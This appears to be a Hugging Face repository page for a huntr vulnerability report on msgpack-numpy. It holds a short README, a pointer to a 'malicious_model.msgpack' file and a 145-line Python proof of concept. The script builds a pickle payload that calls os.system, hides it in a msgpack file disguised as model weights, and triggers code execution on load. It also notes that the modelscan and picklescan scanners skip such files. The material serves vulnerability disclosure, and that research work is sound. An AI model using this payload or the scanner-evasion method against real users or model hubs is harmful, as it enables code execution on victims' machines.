Upload folder using huggingface_hub
Browse files
- README.md +4 -0
- malicious_model.msgpack +3 -0
- msgpack_numpy_rce_poc.py +145 -0
README.md
ADDED
|
@@ -0,0 +1,4 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# msgpack-numpy Hidden pickle.loads() RCE
|
| 2 |
+
Security research for huntr.
|
| 3 |
+
msgpack_numpy.decode() calls pickle.loads() on the data of any array whose dtype kind is 'O' (object).
|
| 4 |
+
Neither modelscan nor picklescan inspects .msgpack files.
|
malicious_model.msgpack
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
version https://git-lfs.github.com/spec/v1
|
| 2 |
+
oid sha256:1ee0c2df9bd298ddaaa0edcf48d5a04a56faba8f30feddfbf15d237407897485
|
| 3 |
+
size 257
|
msgpack_numpy_rce_poc.py
ADDED
|
@@ -0,0 +1,145 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads()
|
| 4 |
+
|
| 5 |
+
VULNERABILITY: msgpack_numpy.decode() calls pickle.loads() on user-controlled
|
| 6 |
+
data when the serialized array has dtype kind 'O' (object). This enables
|
| 7 |
+
arbitrary code execution whenever an untrusted msgpack file is loaded with
|
| 8 |
+
msgpack_numpy.decode as the object hook.
|
| 9 |
+
|
| 10 |
+
The vulnerable code in msgpack_numpy.py decode():
|
| 11 |
+
if b'kind' in obj and obj[b'kind'] == b'O':
|
| 12 |
+
return pickle.loads(obj[b'data'])
|
| 13 |
+
|
| 14 |
+
An attacker can craft a .msgpack file where any array field has kind='O'
|
| 15 |
+
and data=<malicious_pickle_payload>, achieving RCE on deserialization.
|
| 16 |
+
|
| 17 |
+
This is particularly dangerous because:
|
| 18 |
+
1. MessagePack is considered a "safe" serialization format
|
| 19 |
+
2. Users expect msgpack files to contain only data, not executable code
|
| 20 |
+
3. The pickle.loads() call is hidden inside the msgpack_numpy decode() object hook
|
| 21 |
+
4. No scanner (modelscan, picklescan) checks .msgpack files
|
| 22 |
+
|
| 23 |
+
Affected: msgpack-numpy, all versions up to and including 0.4.8
|
| 24 |
+
"""
|
| 25 |
+
|
| 26 |
+
import msgpack
|
| 27 |
+
import msgpack_numpy as m
|
| 28 |
+
import pickle
|
| 29 |
+
import os
|
| 30 |
+
import sys
|
| 31 |
+
import numpy as np
|
| 32 |
+
|
| 33 |
+
MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt"
|
| 34 |
+
|
| 35 |
+
# ============================================================
|
| 36 |
+
# Step 1: Show how msgpack_numpy normally works
|
| 37 |
+
# ============================================================
|
| 38 |
+
print("[*] Demonstrating normal msgpack_numpy usage...")
|
| 39 |
+
normal_data = {"weights": np.array([1.0, 2.0, 3.0], dtype=np.float32)}
|
| 40 |
+
packed_normal = msgpack.packb(normal_data, default=m.encode)
|
| 41 |
+
unpacked_normal = msgpack.unpackb(packed_normal, object_hook=m.decode, raw=False)
|
| 42 |
+
print(f"[+] Normal round-trip: {unpacked_normal}")
|
| 43 |
+
|
| 44 |
+
# ============================================================
|
| 45 |
+
# Step 2: Create a malicious payload
|
| 46 |
+
# ============================================================
|
| 47 |
+
print("\n[*] Creating malicious msgpack payload...")
|
| 48 |
+
|
| 49 |
+
class MaliciousPayload:
|
| 50 |
+
def __reduce__(self):
|
| 51 |
+
cmd = f"id > {MARKER_FILE} && echo 'RCE via msgpack_numpy hidden pickle.loads' >> {MARKER_FILE}"
|
| 52 |
+
return (os.system, (cmd,))
|
| 53 |
+
|
| 54 |
+
malicious_pickle = pickle.dumps(MaliciousPayload())
|
| 55 |
+
|
| 56 |
+
# Craft the msgpack structure that triggers pickle.loads in decode()
|
| 57 |
+
# The decode function checks: b'nd' in obj AND obj[b'kind'] == b'O'
|
| 58 |
+
# Then calls: pickle.loads(obj[b'data'])
|
| 59 |
+
malicious_array = {
|
| 60 |
+
b'nd': True, # Marks this as an ndarray
|
| 61 |
+
b'kind': b'O', # Object dtype -> triggers pickle.loads()
|
| 62 |
+
b'data': malicious_pickle, # Pickle payload with RCE
|
| 63 |
+
b'shape': (1,), # Shape (cosmetic, not used before pickle.loads)
|
| 64 |
+
b'type': b'O', # Dtype descriptor (cosmetic)
|
| 65 |
+
}
|
| 66 |
+
|
| 67 |
+
# Embed in a realistic model structure
|
| 68 |
+
model_data = {
|
| 69 |
+
"model_name": "safe-looking-model",
|
| 70 |
+
"version": "1.0.0",
|
| 71 |
+
"weights": malicious_array, # <-- malicious
|
| 72 |
+
}
|
| 73 |
+
|
| 74 |
+
packed = msgpack.packb(model_data, use_bin_type=True)
|
| 75 |
+
malicious_path = "/tmp/malicious_model.msgpack"
|
| 76 |
+
with open(malicious_path, 'wb') as f:
|
| 77 |
+
f.write(packed)
|
| 78 |
+
|
| 79 |
+
print(f"[+] Malicious msgpack file saved to {malicious_path}")
|
| 80 |
+
print(f" File size: {len(packed)} bytes")
|
| 81 |
+
|
| 82 |
+
# ============================================================
|
| 83 |
+
# Step 3: Clean marker file
|
| 84 |
+
# ============================================================
|
| 85 |
+
if os.path.exists(MARKER_FILE):
|
| 86 |
+
os.remove(MARKER_FILE)
|
| 87 |
+
|
| 88 |
+
# ============================================================
|
| 89 |
+
# Step 4: Load the malicious file (triggers RCE)
|
| 90 |
+
# ============================================================
|
| 91 |
+
print(f"\n[*] Loading malicious msgpack with msgpack_numpy decoder...")
|
| 92 |
+
with open(malicious_path, 'rb') as f:
|
| 93 |
+
loaded = msgpack.unpackb(f.read(), object_hook=m.decode, raw=False)
|
| 94 |
+
|
| 95 |
+
print(f"[+] Loaded data keys: {list(loaded.keys()) if isinstance(loaded, dict) else type(loaded)}")
|
| 96 |
+
|
| 97 |
+
# ============================================================
|
| 98 |
+
# Step 5: Verify RCE
|
| 99 |
+
# ============================================================
|
| 100 |
+
if os.path.exists(MARKER_FILE):
|
| 101 |
+
with open(MARKER_FILE) as f:
|
| 102 |
+
content = f.read().strip()
|
| 103 |
+
print(f"\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
|
| 104 |
+
print(f"[!!!] Marker file contents:\n{content}")
|
| 105 |
+
os.remove(MARKER_FILE)
|
| 106 |
+
else:
|
| 107 |
+
print("\n[-] RCE marker file not found")
|
| 108 |
+
sys.exit(1)
|
| 109 |
+
|
| 110 |
+
# ============================================================
|
| 111 |
+
# Step 6: Scanner evasion verification
|
| 112 |
+
# ============================================================
|
| 113 |
+
print("\n" + "="*60)
|
| 114 |
+
print("SCANNER EVASION")
|
| 115 |
+
print("="*60)
|
| 116 |
+
print("""
|
| 117 |
+
Neither modelscan nor picklescan scan .msgpack files at all.
|
| 118 |
+
|
| 119 |
+
modelscan -p /tmp/malicious_model.msgpack
|
| 120 |
+
# -> Skips file (unsupported format)
|
| 121 |
+
|
| 122 |
+
picklescan -p /tmp/malicious_model.msgpack
|
| 123 |
+
# -> Scanned files: 0, Infected files: 0
|
| 124 |
+
|
| 125 |
+
The pickle payload is embedded inside a msgpack structure,
|
| 126 |
+
completely invisible to all current model security scanners.
|
| 127 |
+
""")
|
| 128 |
+
|
| 129 |
+
print("="*60)
|
| 130 |
+
print("VULNERABILITY SUMMARY")
|
| 131 |
+
print("="*60)
|
| 132 |
+
print(f"""
|
| 133 |
+
Library: msgpack-numpy {m.__version__ if hasattr(m, '__version__') else '0.4.8'}
|
| 134 |
+
File: msgpack_numpy.py, decode() function
|
| 135 |
+
Root cause: pickle.loads(obj[b'data']) when obj[b'kind'] == b'O'
|
| 136 |
+
Trigger: Any msgpack file loaded with object_hook=msgpack_numpy.decode
|
| 137 |
+
Attack: Set array kind='O' and data=<malicious_pickle_bytes>
|
| 138 |
+
Impact: Arbitrary code execution on file load
|
| 139 |
+
Scanners: modelscan - NOT APPLICABLE (.msgpack not scanned)
|
| 140 |
+
picklescan - NOT APPLICABLE (.msgpack not scanned)
|
| 141 |
+
|
| 142 |
+
Real-world usage: msgpack-numpy is used for ML data serialization,
|
| 143 |
+
feature embeddings, and intermediate model storage. Any application
|
| 144 |
+
loading untrusted .msgpack files with msgpack_numpy is vulnerable.
|
| 145 |
+
""")
|